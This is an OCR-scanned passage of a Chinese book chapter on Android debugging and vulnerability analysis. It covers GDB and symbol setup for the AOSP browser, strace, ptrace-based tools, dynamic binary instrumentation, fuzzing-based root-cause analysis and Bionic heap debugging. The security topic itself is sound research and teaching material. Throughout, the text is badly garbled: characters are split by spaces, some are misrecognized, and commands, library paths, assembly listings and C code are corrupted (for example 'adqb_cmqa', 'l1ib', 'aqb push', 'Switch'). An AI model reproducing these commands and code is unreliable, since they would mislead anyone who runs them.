含 部 分 符号 。 有 人 会 认为 , 如 果 使 用 自 定 义 编译 生成 的 带 有 完全 符号 的 二 进 制 文件 来 蔡 换 这 些 文 
件 ， 情 况 会 得 以 改善 。 然 而 ，ndk-gdb 会 覆盖 这 些 现 有 文件 。 为 了 避免 这 种 情况 ， 只 需 简单 地 注 
释 以 run adqb_cmqa pull 开头 的 命令 的 行 即 可 。 这 样 ，ndk-gdb 就 会 使 用 带 有 完全 符号 的 二 进 
制 文件 。 因 为 只 用 到 了 较 少 的 带 符号 文件 ,使 用 ndk-gdb 通常 比 使 用 sabclient 速度 快 。 此 外 ， 
还 能 够 准确 地 控制 加 载 哪些 符号 。 

正如 7.6.3 节 和 7.6.4 节 深 入 讨论 到 的 ， 直 接 调 用 AOSP GDB 客户 端 是 调试 原生 代码 的 首选 
方法 。 使 用 此 方法 能 够 最 大 化 地 控制 目标 设备 和 GDB 客户 端 自身 的 情况 。 同 时 调试 不 同 的 项 目 
时 ， 它 也 支持 管理 项 目 特定 的 配置 。 本 节 剩 余部 分 概述 了 如 何 搭建 这 样 的 环境 并 进行 最 佳 的 
Android 浏览 器 调试 体验 。 

要 搭建 项 目 特定 的 最 佳 调试 环境 ， 第 一 步 是 创建 存放 项 目 相关 数据 的 目录 。 此 次 演示 在 
AOSP 根 目 录 下 创建 gn-browser-dbg 目录 : 


dev:~/android/source $ mkdir -p gn-browser-dbg && cd S_ 
dev:gn-browser-dbg $8 


下 一 步 是 为 想 要 加 载 符 号 的 模块 创建 符号 链接 。 我 们 只 使 用 当前 目录 下 的 符号 链接 , 而 不 是 
像 内 置 gabclient 那样 使 用 整个 符号 目录 。 加 载 所 有 符号 浪费 时 间 和 资源 ， 而 且 通 常 是 不 必要 
的 。 虽然 在 超 快 的 SSD 或 RAM 驱动 器 上 存储 符号 文件 是 有 帮助 的 ， 但 是 只 起 到 了 有 限 的 作用 。 
为 了 加 快 该 过 程 ， 应 该 上 只 为 有 限 的 模块 加 载 符号 : 





























































































































dev:gn-browser-dbg $ ln -s ../out/target/product/maguro/symbols 
dev:gn-browser-dbg $ ln -s symbols/system/bin/linker 
dev:gn-browser-dbg $ ln -s symbols/system/bin/app_process 
dev:gn-browser-dbg $ ln -s symbols/system/l1lib/libc.so 
dev:gn-browser-dbg $ ln -s symbols/system/l1ib/libwebcore.so 
dev:gn-browser-dbg $ ln -s symbols/system/l1ib/libstdc++.so 
dev:gn-browser-dbg $ ln -s symbols/system/l1ib/libdvm.so 
dev:gn-browser-dbg $ ln -s symbols/system/l1ib/libutils.so 
dev:gn-browser-dbg $ ln -s symbols/system/l1lib/libandroid_ runtime.so 











此 处 ， 首 先 为 符号 目录 自身 创建 符号 链接 ， 然 后 为 核心 系统 文件 创建 符号 链接 ， 包 括 
libwebcore.so ( WebKit )、libstdc++.so 和 1libdvm.so ( Dalvik VM )。 之 后 创建 GDB 脚本 。 该 脚本 
是 调试 工程 的 基础 ， 可 以 直接 包含 更 多 的 高 级 脚本 。 然 后 ， 只 需要 两 个 命令 就 可 开始 调试 : 


dev:gn-browser-dbg $ cat > Script.gdqb 
# tell gdb where to find symbols 

set solib-search-path . 

target remote 127.0.0.1:31337 

拉 

dev:gn-browser-dbg $ 
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如 注释 所 描述 的 ,第 一 个 命令 用 于 告诉 GDB 客户 端 在 当前 目录 下 查找 有 符号 文件 。GDB 服 
务 器 指明 加 载 哪些 模块 ，GDB 客户 端 相 应 地 加 载 这 些 指定 的 模块 。 第 二 个 命令 大 家 应 该 很 熟悉 ， 
它 告知 GDB 客户 端 去 哪里 连接 GDB 服务 器 。 

最 后 , 可 以 运行 所 有 程序 来 查看 该 过 程 的 运行 情况 。 下 面 的 片段 展示 了 在 最 精简 配置 下 的 调 
试 情况 。 

dev:gn-browser-dbg $ arm-eabi-gdb -q -x script.gdb app_process 

Reading symbols from /android/source/gn-browser-dbg/app_process...done. 

warning: Could not load shared library symbols for 86 libraries, e.g. libm. 

so. 

Use the "info sharedlibrary" command to see the complete listing. 

Do you need "set solib-search-path" or "set sysroot"? 

warning: Breakpoint address adjusted from 0x40079b79 to 0x40079b78 . 




















epoll wait () at bionic/libc/arch-arm/syscalls/epoll wait.S:10 
10 mov 这 久生 
(gdb) back 
0 epoll wait () at bionic/libc/arch-arm/syscalls/epoll wait.S:10 


1 0x400dlfcc in android::Looper::pollInner (this=0x415874c8, 
timeoutMillis=<optimized 
out>) 

at frameworks/native/libs/utils/Looper.cpp:218 
2 0x400d21f0 in android::Looper::pollOnce (this=0x415874c8, 
timeoutMillis=-1, 
outFd=0x0, outEvents=0x0, outData=0x0) 

at frameworks/native/libs/utils/Looper.cpp:189 
3 0x40209c68 in pollOnce (timeoutMillis=<optimized out>, 
this=<optimized out>) at frameworks/native/include/utils/Looper.h:176 
4 android::NativeMessageQueue::pollOnce (this=0x417fdb10, env=0x416d1d90, 
timeoutMillis=<optimized out>) 

at frameworks/base/core/jni/android os_ MessageQueue.cpp:97 
5 Ox4099bc50 in dvmPlatformInvoke () at dalvik/vm/arch/arm/CallEABI.S:258 
6 Ox409cbed2 in dvmCallJNIMethod (args=0x579f9e18, pResult=0x417841d0, 
method=0x57b57860, self=0x417841c0) 

at dalvik/vm/Jni.cpp:1185 
7 0x409a5064 in dalvik_ mterp () at 
dalvik/vm/mterp/out/InterpAsm-armv7-a-neon.S:16240 
8 0x409a95f0 in dvmIinterpret (self=0x417841c0, method=0x57b679b8, 
pResult=0xbec947d0) at dalvik/vm/interp/Interp.cpp:1956 
9 0x409dele2 in dvmInvokeMethod (obj=<optimized out>, method=0x57b679b8, 
argList=<optimized out>, params=<optimized out>, 
returnType=0x418292a8, noAccessCheck=false) at 
dalvik/vm/interp/Stack.cpp:737 
10 0x409e5de2 in Dalvik_ java_ lang_reflect Method_ invokeNative 
(args=<optimized 
out>, pResult=0x417841d0) 

at dalvik/vm/native/java_lang_reflect Method.cpp:101 

#11 Ox409a5064 in dalvik mterp () at 
dalvik/vm/mterp/out/InterpAsm-armv7-a-neon.S:16240 
#12 Ox409a95f0 in dvmInterpret (self=0x417841c0, method=0x57b5cc30, 
pResult=0xbec94960) 
at dalvik/vm/interp/Interp.cpp:1956 
#13 Ox409ddf24 in dvmCallMethodV (self=0x417841c0, method=0x57b5cc30, 




















188 ”第 7 章 调试 与 分 析 安 全 漏洞 





obj=<optimized out>，fromJni=<optimizedq out>, 
pResult=0xbec94960, args=...) at dalvik/vm/interp/Stack.cpp:526 
#14 0x409c7b6a in CallStaticVoidMethodV (env=<optimized out>, 
jclazz=<optimized 
out>, methodID=0x57b5cc30, args=<optimized out>) 
at dalvik/vm/Jni .cpp:2122 
#15 Ox401ed698 in _JNIEnNnVv::CallStaticVoidMethod (this=<optimized out>, 
clazz=<optimized out>, methodID=0x57b5cc30) 
at libnativehelper/include/nativehelper/jni.h:780 
#16 0x401ee32a in android::AndroidRuntime::start (this=<optimized out>, 
className=0x4000d3a4 "com.android.internal.os.ZygoteInit", 
options=<optimized out>) at frameworks/base/core/jni/AndroidRuntime. 
cpp:884 
#17 Ox4000d05e in main (argc=4, argv=0xbec94b38) at 
frameworks/base/cmds/app_process/app_main.cpp:231 
(gdb) 


从 libwebcore.so 中 加 载 符号 需要 相当 长 的 时 间 , 因为 它 太 大 了 。 使 用 SSD 或 RAM 磁盘 会 大 
大 加 快 加 载 速 度 。 可 以 看 出 ,前 面 的 片段 中 使 用 了 完全 符号 ， 显示 出 了 函数 名 、 源 代码 文件 、 行 
0 

. 源 代码 级 调试 

0 终极 目标 是 能 够 在 源 代 码 级 别 进行 J 幸运 的 是 , 使 用 AOSP 中 checkout 
出 的 代码 配合 AOSP 支持 的 Nexus 设备 就 可 以 做 到 这 一 点 。 如 果 一 直 按 照 前 面 小 节 中 的 步骤 来 操 
作 , 通过 使 用 自己 编译 出 的 带 符 号 的 二 进 制 文件 就 已 经 可 以 实现 源 代码 级 的 调试 了 。 只 需 简 单 地 
在 GDB 客户 端 中 执行 一 些 命令 就 能 看 到 这 个 过 程 ， 如 以 下 片段 所 示 : 


# after attaching, as before 



































epoll wait () at bionic/libc/arch-arm/syscalls/epoll wait.S:10 
10 mov r7, ip 

(gdb) list 

5 

6 ENTRY (epoll_ wait) 

2 mov TS :证 

8 ldr r7, =__NR_ epoll wait 
9 Swi #0 

sl mov a 人 

水生 cmn r0, #(MAX_ ERRNO + 1) 
1 bxls J] 

站 总 neg rOy TO 

14 b Set_errno 


(gdb) up 
#1 0x400dlfcc in android::Looper::pollIinner (this=0x41591308, 
timeoutMillis=<optimized out>) 

at frameworks/native/libs/utils/Looper.cpp:218 


218 int eventCount = epoll wait (mEpollFd, eventItems, EPOLL MAXx_ 
EVENTS, 

timeoutMillis); 

(gdb) list 

213 int result = ALOOPER_POLL WAKE; 

214 mResponses.clear(); 


Re mResponseIndex = 0; 
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216 

217 struct epoll_event eventItems [EPOLI_MAX_EVENTS] ; 

218 int eventCount = epoll wait (mEpollFd, eventItems, EPOLL MAX_ 
EVENTS, 

timeoutMillis); 

219 

22:0 // Acquire lock. 

221 mLock.lock(); 

222 

(gdb) 


Ee 


附加 到 目标 进程 后 ， 能 够 同时 看 到 函数 调用 栈 中 的 汇编 和 C++ 源 代码 。GDB 的 list 命令 
会 显示 当前 代码 位 置 附近 的 10 行 代码 。up 命令 在 调用 栈 中 向 上 移动 ( 调用 帧 方向 )，down 命令 
向 下 移动 。 

如 果 符 号 是 在 其 他 机 器 上 生成 的 ， 或 者 符号 生成 后 源 代 码 被 移动 ， 那 么 源 代码 就 无 法 显示 ， 
并 会 出 现 错误 信息 ， 如 以 下 片段 所 示 : 

(gdb) up 
#1 0x400dlfcc in android::Looper::pollInner (this=0x415874c8, 
timeoutMillis=<optimized out>) 
at frameworks/native/libs/utils/Looper.cpp:218 


218 frameworks/native/libs/utils/Looper.cpp: No such file or directory. 
in frameworks/native/libs/utils/Looper.cpp 























(gdqb) 

为 了 解决 这 种 问题 , 需要 创建 符号 链接 , 使 其 指向 文件 系统 中 源 代 码 所 在 的 位 置 。 以 下 片段 
展示 了 所 需 的 命令 : 

dev:gn-browser-dbg $ ln -s ~/android/source/bionic 


dev:gn-browser-dbg $ ln -s ~/android/source/dalvik 
dev:gn-browser-dbg $ ln -s ~/android/source/external 


完成 以 上 操作 后 ， 就 可 以 恢复 源 代 码 级 的 调试 了 。 此 时 可 以 在 GDB 中 查看 源 代码 ， 基 于 源 
代码 位 置 设置 断 点 ， 以 漂亮 的 格式 显示 结构 ， 等 等 。 
(gdb) break 'WebCore::RenderObject::layoutIfNeeded()' 
Breakpoint 1 at Ox5d3a3e44: file 
external/webkit/Source/WebCore/rendering/RenderObject.h, line 524. 


(gdb) cont 
Continuing. 


只 要 浏览 需 打 开 一 个 页 面 ， 就 会 触发 该 断 点 。 在 其 上 下 文 环境 中 , 可 以 查看 RenderObject 
的 状态 ， 并 分 析 发 生 了 什么 。 第 8 章 会 详细 讨论 这 些 对 象 。 




















7.6.6 调试 非 AOSP 设备 


有 时 候 需 要 调试 运行 在 非 AOSP 设备 上 的 代码 ,或 许 有 bug 的 代码 并 没有 在 AOSP 支持 的 设 
备 上 出 现 ， 或 者 相应 代码 与 AOSP 中 的 不 同 。 后 者 经 常 出 现在 原始 设备 制造 商 ( OEM ) 直接 出 
的 设备 上 ， 因 为 在 OEM 开发 线 中 所 作 的 修改 可 能 会 引入 AOSP 中 不 存在 的 问题 。 不 幸 的 是 ， 
在 这 些 设备 上 的 调试 更 加 麻烦 。 








丙 
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在 这 些 设备 上 调试 会 面临 一 些 挑 战 , 大 部 分 集中 在 两 个 主要 问题 上 。 第 一 ， 难 以 准确 地 知道 
该 设备 系统 是 使 用 哪 种 工具 链 生 成 的 。OEM 可 能 选择 商业 工具 链 、 老 版 本 的 公开 工具 链 ， 甚 至 
是 自 定义 修改 后 的 工具 链 。 即 使 成 功 地 确定 了 所 使 用 的 工具 链 ,也 可 能 无 法 获取 到 该 工具 链 。 使 
用 正确 的 工具 链 很 重要 ， 因 为 一 些 工具 链 之 间 可 能 不 兼容 。 例 如 ，GDB 所 支持 协议 的 不 同 可 能 
导致 GDB 客户 端 遇 到 错误 甚至 崩溃 。 第 二 ,， 非 AOSP 设备 很 少 包含 任何 类 型 的 符号 ， 在 没有 获 
取 到 完整 编译 系统 的 情况 下 自己 编译 是 不 可 能 的 ,除了 函数 名 、 源 代码 文件 和 行 号 信息 不 可 用 外 ， 
标识 处 理 器 模式 的 ARM 符号 也 是 缺失 的 。 这 一 重要 信息 的 缺失 导致 难以 确定 代码 处 于 处 理 器 的 
哪 种 执行 模式 ， 从 而 在 设置 断 点 和 查看 调用 栈 时 出 现 问题 。 

调试 非 Nexus 设备 的 整体 流程 与 Nexus 设备 非常 相似 ， 按 照 7.6.3 节 中 的 步骤 就 可 以 得 到 期 
望 的 结果 。 

找到 可 以 工作 的 GDB 服务 器 和 GDB 客户 端 可 能 比较 困难 ,需要 尝试 这 些 程序 的 一 些 不 同 版 
本 。 如 果 能 够 确定 生成 设备 二 进 制 文件 所 使 用 的 工具 链 ， 使 用 该 工具 链 中 的 GDB 服务 器 和 客户 
端 会 得 到 最 好 的 结果 。 完 成 此 步 又 后 ， 就 可 以 勇往直前 了 。 

如 果 没 有 符号 ，GDB 就 无 法 知道 二 进 制 文件 的 哪些 部 分 是 Thumb 代码 ， 哪 部 分 是 ARM 代 
码 。 因 此 , 无 法 自动 确定 如 何 反 汇 编 或 者 设置 断 点 。 可 以 使 用 静态 分 析 工 具 逆向 分 析 代 码 来 解决 
此 问题 。GDB 也 支持 访问 当前 程序 状态 寄存 器 ( CPSR )， 检 查 该 寄存 需 的 第 5 位 可 以 得 知 处 理 
絮 处 于 ARM 模式 还 是 Thumb 模式 。 一 旦 确定 调试 带 位 于 Thumb 模式 的 函数 中 , 运行 带 有 thumb 
值 的 set arm fallback-mode 或 set arm force-mode 命令 会 告知 GDB 如 何 对 待 该 郴 数 。 
如 果 在 Thumb 函数 中 设置 断 点 ， 千 万 要 记 住 把 地 址 加 一 ， 这 会 通知 GDB 该 地 址 指向 的 是 一 个 
Thumb 指令 ， 从 而 改变 其 插入 断 点 的 方式 。 

也 可 以 直接 使 用 CPSR 寄存 器 设置 断 点 ， 如 下 所 示 : 

(gdb) break 0x400c0e88 + ((S$Scpsr>>5)&1) 

使 用 此 方式 时 要 小 心 , 因为 不 能 保证 目标 函数 与 调试 器 当前 上 下 文 在 相同 的 模式 下 运行 。 在 
任何 情况 下 , 正确 运行 的 概率 都 是 50%。 设置 断 点 后 , 如 果断 点 没有 触发 或 者 目标 进程 发 生 错 误 ， 
可 能 是 因为 设置 断 点 时 处 于 错误 的 模式 之 下 。 

即使 有 了 这 些 技术 的 支持 ， 调 试 非 AOSP 设备 仍然 是 不 可 预知 的 ， 可 能 会 遇 到 各 种 问题 。 


7.7 调试 混合 代码 


Android 操作 系统 包含 原生 和 Dalvik 代码 。 在 Android 框架 层 ， 有 许多 代码 路 径 从 Dalv 冰 代 
人 码 执行 到 原生 代码 ; 一 些 代码 甚至 从 原生 代码 回调 至 Dalvik VM。 调 试 混合 代码 时 ， 查 看 并 单 步 
调试 整个 代码 路 径 是 非常 有 用 的 ， 尤 其 是 查看 整个 函数 调用 栈 。 

幸运 的 是 ,在 Eclipse 中 可 以 非常 方便 地 同时 调试 Dalvik 和 原生 代码 。 虽 然 会 偶尔 发 生 一 些 
小 问题 , 但 是 可 以 在 两 种 类 型 的 代码 上 设置 断 点 。 不 论 到 达 哪 种 断 点 ，Eclipse 都 会 正确 地 暂停 执 
行 并 支持 交互 式 调试 。 为 了 调试 混合 代码 ， 需 要 结合 7.5 节 和 7.6 节 介 绍 的 所 有 技术 。 在 Eclipse 
中 启动 调试 会 话 时 ， 务 必 使 用 Android Native Application 调试 选项 。 
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7.8 其 他 调试 技术 


虽然 交互 式 调试 方法 是 跟踪 数据 流 或 确定 假设 的 最 好 方法 , 但 是 一 些 其 他 方法 也 可 以 替代 或 
增强 调试 过 程 。 在 源 代码 中 植 入 调试 语句 是 查看 代码 覆盖 路 径 或 跟踪 变量 内 容 的 常用 方法 。 不 论 
是 使 用 自 定义 的 调试 器 还 是 ARM 平 台 下 的 GDB , 在 设备 上 调试 本 身 就 有 一 定 的 作用 。 最 后 , 一 
些 对 于 时 序 敏感 的 问题 可 能 需要 使 用 高 级 技术 ,例如 注入 ( instrumentation )。 本 节 将 讨论 这 些 方 
法 的 优势 和 缺陷 。 
























































7.8.1 调试 语句 


直接 在 源 代 码 中 植 和 人 调试 语句 是 调试 程序 最 古老 的 方法 之 一 ,对 Dalvik 和 原生 C/C++ 代码 都 
有 效 。 遗 憾 的 是 , 该 技术 在 没有 源 代码 的 情况 下 是 不 能 使 用 的 。 即 便 可 以 获得 源 代码 ， 这 种 方法 
也 需要 重新 编译 ,并 将 生成 的 二 进 制 文件 重新 部 署 到 设备 上 。 在 某 些 情况 下 ， 可 能 需要 通过 重启 
来 重新 加 载 目标 代码 。 如 果 要 将 调试 语句 迁移 到 源 代码 的 新 版 本 上 , 可 能 需要 进行 额外 的 移植 工 
作 。 虽然 这 些 缺 陷 会 导致 较 高 的 前 期 成 本 , 但 是 调试 语句 自身 的 运行 成 本 非常 低 。 此 外 , 植 入 调 
试 语句 可 以 很 好 地 将 源 代码 与 运行 时 的 情况 关联 起 来 。 总 而 言 之, 这 个 方法 是 跟踪 bug 和 理解 程 
序 的 可 靠 选择 。 
7.8.2 在 设备 上 进行 调试 

调试 类 似 Android 手机 的 舱 入 式 设备 ,远程 调 试 方法 已 经 成 为 了 事实 标准 , 但 是 直接 在 设备 
上 进行 调试 可 以 避免 一 些 麻 烦 。 首 先 , 远程 调试 比 在 设备 上 调试 慢 得 多 ， 因 为 每 一 个 调试 事件 都 
需要 往返 于 设备 和 主机 调试 器 之 间 。 远 程 调试 对 于 有 条 件 的 断 点 来 说 尤其 慢 ,， 因为 这 需要 通过 和 额 
外 的 一 次 往返 确定 条 件 是 否 满足 。 此 外 , 在 设备 上 进行 调试 有 时 候 不 需要 主机 。 有 多 种 方式 可 以 
实现 在 设备 上 的 调试 ， 本 节 对 部 分 进行 介绍 。 

1. strace 

尝试 调试 一 些 古 怪 的 代码 行为 时 ，strace 工具 就 是 天 网 之 物 。 该 工具 支持 系统 调用 级 别 的 
跟踪 功能 , 这 也 是 其 名 称 的 由 来 。 在 系统 调用 级 别 进行 调试 可 以 方便 地 查看 原因 不 明 的 “no such 
file or directory” 错 误 源 自 何 处 。 该 工具 也 有 助 于 准确 查看 是 什么 系统 调用 导致 了 月 演 。strace 
工具 支持 启动 新 的 进程 ,也 可 以 附加 至 已 有 的 进程 。 对 于 查看 该 进程 在 什么 地 方 挂 起 , 或 者 确认 
网 络 通信 或 进程 间 通 信 ( IPC ) 确实 正在 发 生 ， 附 加 至 已 有 进程 是 非常 有 用 的 。 
strace 工具 在 AOSP 中 ,被 编译 为 userdebug 生成 的 一 部 分 。 然 而 ， 该 工具 在 配置 文件 
中 并 不 会 被 放 人 默认 安装 镜像 。 将 该 二 进 制 文件 推送 至 设备 需要 执行 如 下 代码 : 

dev:~/android/source $ aqb push \ 

out/target/product/maguro/obj/EXECUTABLES/strace_intermediates/LINKED/ 

strace.\ 


/data/local/tmp/ 
656 KB/s (625148 bytes in 0.929s) 
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上 面 的 例子 来 自 于 我 们 为 Galaxy Nexus 生成 的 环境 。 该 二 进 制 文件 可 以 应 用 在 支持 ARMv7 
的 所 有 设备 上 。 

2. 自 编译 GDB 

在 Android 设备 上 直接 运行 GDB 是 再 理想 不 过 的 。 不 过 GDB 不 直接 支持 Android， 而 且 将 
GDB 移植 到 Android 上 运行 并 非 易 事 。 已 经 有 人 尝试 过 创建 原生 的 Android GDB 二 进 制 ， 一 些 
人 甚至 宣称 自己 成 功 了 。 其 中 之 一 是 Alfredo Ortega, 他 在 https://sites.google.com/site/ortegaalfredo/ 
android 上 提供 了 GDB 6.7 和 6.8 版 本 的 二 进 制 文件 。 另 一 种 方法 可 以 参考 来 自 Debian 项 目的 
Debootstrap 使 用 说 明 : https://wiki.debian.org/ChrootOnAndroid。 焉 憾 的 是 ， 上 面 这 两 种 二 进 制 文 
件 都 不 支持 Android 线程 ， 只 能 调试 进程 的 主线 程 。 
























































注意 使 用 Debootstrap 版 本 的 GDB 时 ， 可 以 按照 说 明 使 用 1d.so 在 chroot 外 运行 chroot 内 的 二 
进 制 文件 。 此 外 , 将 /system/1ib 添加 到 LD_LIBRARY_PATH 的 开头 以 修复 符号 解析 问 
题 。 


3. 编写 自 定义 调试 器 

本 章 用 来 调试 原生 代码 的 所 有 工具 都 是 基于 ptrace API 创 建 的 ,ptrace API 是 用 于 调试 进 
程 的 标准 Unix API。 因 为 该 API 被 实现 为 Linux 内 核 的 系统 调用 ， 所 以 几乎 所 有 的 Linux 系统 中 
都 存在 该 API。 只 有 很 少 的 情况 ， 例 如 一 些 Google TV 设备 ,不 支持 btrace。 研 究 人 员 使 用 该 
API 能 够 直接 开发 强大 的 自 定 义 调 试 器 ， 而 无 需 依 赖 现 有 的 GDB。 本 书 作者 创建 的 一 些 工 具 就 
是 基于 ptrace 的 。 这 些 工 具 直 接 在 设备 上 运行 ,运行 速度 通常 比 GDB 快 ( 甚至 比 设备 上 的 GDB 
还 快 )。 


7.8.3 动态 二 进 制 注入 


即便 调试 器 处 于 最 佳 状 态 , 也 可 能 会 有 其 他 问题 : 使 用 大 量 跟踪 断 点 可 能 导致 调试 过 程 非常 
缓慢 ; 在 时 序 敏感 的 代码 区 域 设 置 断 点 可 能 影响 程序 运行 ,使 漏洞 利用 的 开发 更 加 复杂 。 在 这 些 
情况 下 ， 另 一 种 优秀 的 技术 就 可 以 发 挥 作用 了 。 

动态 二 进 制 注 入 (Dynamic Binary Instrumentation，DBI ) 是 一 种 将 额外 代码 插入 程序 正常 执 
行 流 的 方法 , 通常 被 称 为 hooking。 一 般 是 首先 构造 一 些 自 定义 代码 , 然后 将 其 注入 目标 进程 中 。 
与 断 点 一 样 ，DBI 也 需要 对 一 些 重要 的 代码 进行 重 写 。 然 而 ，DBI 并 非 插 入 一 条 断 点 指令 ， 而 是 
插入 跳 转 指 令 ， 将 执行 流 重 定向 到 所 插入 的 自 定义 代码 上 。 该 方法 大 大 提升 了 性 能 ,避免 了 不 必 
要 的 上 下 文 切换 。 此 外 , 被 注入 的 自 定 义 代码 可 以 直接 访问 进程 内 存 空间 , 不 必 进 行 额外 的 上 下 
文 切换 来 获取 内 存 内 容 (和 ptrace 一 样 )。 





































































































注意 DBI 是 一 项 强大 的 技术 ， 不 只 应 用 于 调试 ， 也 可 以 用 来 在 运行 时 修补 漏洞 ， 扩 展 功能 ， 
在 代码 中 增加 新 的 接口 来 进行 测试 ， 等 等 。 
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本 书 作 者 利用 ptraceAPI 和 DBI 编 写 了 一 些 工 具 。Collin Mulliner 的 Android 动态 二 进 制 注 
和 人 工具 包 (adbi ) 和 Georg Wicherski 的 AndroProbe 都 使 用 了 ptrace 来 注入 自 定义 代码 ， 但 是 
实现 的 目的 不 同 。Collin 的 工具 包 可 以 在 https://github.com/crmulliner/adbi 找 到 。 


7.9 漏洞 分 析 


在 信息 安全 领域 , 漏洞 分 析 这 一 术语 指 的 是 集中 精力 去 发 现 、 分 类 和 理解 系统 中 潜在 的 危险 
问题 。 这 个 定义 几乎 涵盖 了 信息 安全 中 的 一 切 。 把 这 个 定义 细 分 来 看 ， 就 会 涉及 研究 人 员 和 分 析 
师 使 用 的 许多 技术 和 程序 。 不 管 最 终 目 标 是 攻击 还 是 防御 ， 实 现 的 步骤 都 极其 相似 。 

本 章 剩余 的 部 分 关注 漏洞 分 析 当 中 的 一 个 小 领域 : 分 析 内 存 破坏 漏洞 导致 的 骨 溃 。 本 章 介绍 
的 调试 技术 可 以 为 第 6 章 和 第 8 章 建 立 联系 。 掌 握 这 类 分 析 技术 后 ,研究 人 员 能 够 深入 理解 漏洞 
的 成 因 和 潜在 的 影响 。 

无 论 从 漏洞 修补 还 是 利用 的 角度 来 看 , 对 内 存 破 坏 漏洞 的 分 析 都 是 富有 挑战 性 的 。 分析 有 两 
个 主要 的 目标 : 明确 问题 的 根源 ， 以 及 判断 漏洞 的 可 利用 性 。 


7.9.1 明确 问题 根源 

对 于 潜在 可 利用 的 内 存 破 坏 漏洞 ,首要 任务 是 理解 bug 产生 的 根源 。 和 其 他 信息 安全 概念 一 
样 , 讨论 问题 根源 时 会 有 不 同 的 明确 程度 。 对 于 山 江 分 析 来 说 , 我 们 把 带 来 漏洞 状态 的 首次 异常 
行为 作为 问题 根源 。 



















































































注意 未 定义 行为 可 能 会 产生 许多 类 型 的 内 存 破坏 。MITRE 的 通用 缺陷 列表 ( CWE ) 项 目 记录 
了 这 些 类 型 信息 ， 更 多 内 容 参 考 http://cwe.mitre.org/data/index.html。 














这 些 异 常 行为 来 自 于 编程 语言 中 的 未 定义 行为 (undefined behavior ) 概念 。 这 个 术语 指 的 是 
那些 规范 中 没有 定义 的 行为 ， 可 能 是 由 于 不 同 的 底层 架构 、 内 存 模型 或 者 边 角 细 节 造 成 的 。C 和 
C++ 语言 规范 中 就 定义 了 很 多 未 定义 行为 。 在 理论 上 ， 未 定义 的 行为 可 能 会 导致 任何 事情 发 生 ， 
如 正常 行为 、 故 意 的 崩溃 、 微 妙 的 内 存 破坏 等 。 这 些 行为 是 研究 者 感 兴趣 的 一 个 重要 领域 。 

正确 地 判断 漏洞 根源 是 漏洞 分 析 中 最 重要 的 一 步 。 对 于 防御 者 来 说 ,如 果 不 能 准确 理解 问题 
的 根源 ,就 很 可 能 无 法 充分 解决 问题 。 对 于 攻击 者 来 说 , 理解 问题 根源 是 漫长 攻击 过 程 中 的 第 一 
步 。 只 要 想 根据 漏洞 的 可 利用 性 来 对 漏洞 优先 级 进行 排序 ， 对 漏洞 原因 的 分 析 都 是 必 不 可 少 的 。 
值得 高 兴 的 是 ， 有 很 多 技巧 和 有 用 的 工具 来 帮助 我 们 完成 这 个 任务 。 

1. 提示 和 技巧 

寻找 漏洞 根源 需要 学 习 很 多 技巧 , 这 里 介绍 其 中 的 一 小 部 分 。 具体 使 用 哪些 技术 取决 于 异常 
行为 是 如 何 被 发 现 的 。 模 糊 测试 技术 可 以 用 来 比较 和 精简 输入 ，Android 等 操作 系统 也 包含 了 一 
些 辅助 调试 工具 。 调 试 器 是 非常 关键 的 工具 ， 要 充分 利用 它 的 特性 。 当 然 ， 漏 洞 最 终 的 根源 存在 
于 代码 本 身 ， 这 些 技 术 有 助 于 快速 定位 相关 代码 。 
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比较 和 精简 输入 

模糊 测试 方法 是 自动 生成 输入 并 进行 测试 , 直到 找到 引发 异常 行为 的 输入 , 然后 通过 分 析 输 
人 来 理解 错误 原因 。 这 是 一 个 非常 好 的 思路 。 

对 于 基于 变异 的 模糊 测试 来 说 , 通过 比较 变异 前 后 的 样本 可 以 找到 差异 所 在 。 例 如 ， 如 果 对 
文件 格式 进行 模糊 测试 时 只 改变 了 一 个 字 节 , 就 可 以 通过 两 个 文件 的 差异 分 析出 究竟 是 哪个 值 发 
生 了 改变 。 使 用 同一 个 解析 器 产生 了 语义 的 改变 , 就 可 以 分 析出 改过 的 字 节 究竟 是 一 个 长 度 值 的 
类 型 还 是 标签 长 度 值 (TLV ) 类 型 ; 还 可 以 进一步 分 析出 这 个 字 节 和 哪 一 个 标签 相关 。 这 些 语义 

言 息 为 研究 者 寻找 相关 代码 提供 了 很 好 的 提示 。 

无 论 是 基于 变异 还 是 基于 生成 的 模糊 测试 , 精简 输入 都 很 有 帮助 。 精 简 输 入 有 两 种 方式 : 恢 
复 变 异 和 消除 不 必要 的 输入 。 恢复 变异 可 以 帮助 找到 真正 产生 异常 行为 的 变异 。 消 除 测试 当中 不 
改变 运行 结果 的 输入 部 分 ,就 意味 着 可 以 减少 需要 分 析 的 目标 。 考 虑 前 面 比较 输入 的 例子 ， 如果 
有 上 万 个 数据 包含 同样 的 tag 值 ， 分 析 就 没 法 进行 了 ， 因 为 会 得 到 上 万 次 断 点 。 消 除 那些 没 必 要 
的 数据 块 就 能 够 将 命中 的 断 点 精简 为 一 。 与 输入 比较 的 方法 一 样 , 语义 信息 可 以 很 好 地 帮助 我 们 
精简 输入 。 将 文件 格式 划分 为 分 层 结构 的 组 件 ， 然 后 在 不 同 的 层级 上 进行 删除 , 可 以 加 快 输入 精 
简 的 过 程 。 
虽然 这 两 种 技术 很 强大 , 但 是 很 难 用 于 模糊 测试 以 外 的 漏洞 发 现 方法 。 后 面 要 讲 的 其 他 技术 
适用 于 大 量 分 析 场 景 ， 更 加 通用 。 

Android 堆 调 试 

Android 的 Bionic C 运行 时 库 包 含 了 内 建 的 堆 调 试 工具 ,这 个 特性 在 http://source.android.com/ 
devices/native-memory.html 中 有 人 简单 的 讨论 。 该 特性 受 系 统 属性 1ipc .debug .malloc 控制 。 如 
前 面 的 网 页 所 述 ， 想 要 为 那些 从 Zygote fork 出 来 的 进程 开启 堆 调试 工具 ( 例如 浏览 器 )， 需 要 重 
启 整个 Dalvik 运行 时 。 相 应 的 方法 已 经 在 7.5.3 节 中 进行 了 介绍 。 

通过 这 个 变量 ，Android 提供 了 调试 堆 内 存 错误 的 4 种 策略 。bionic/libc/bionic 目录 下 的 
malloc_debug_common.cpp 文件 包含 更 多 的 细节 ， 如 下 所 示 : 















































































































































455 // Initialize malloc dispatch table with appropriate routines. 
456 Switch (debug_level) { 

457 case 1: 

458 InitMalloc(&gMallocUse, debug_level, "leak"); 

459 break; 

460 Case 5: 

461 InitMalloc(&gMallocUse, debug_level, "fill"); 

462 break; 

463 case 10: 

464 InitMalloc(&gMallocUse, debug_level, "chk"); 

465 break; 

466 case 20: 

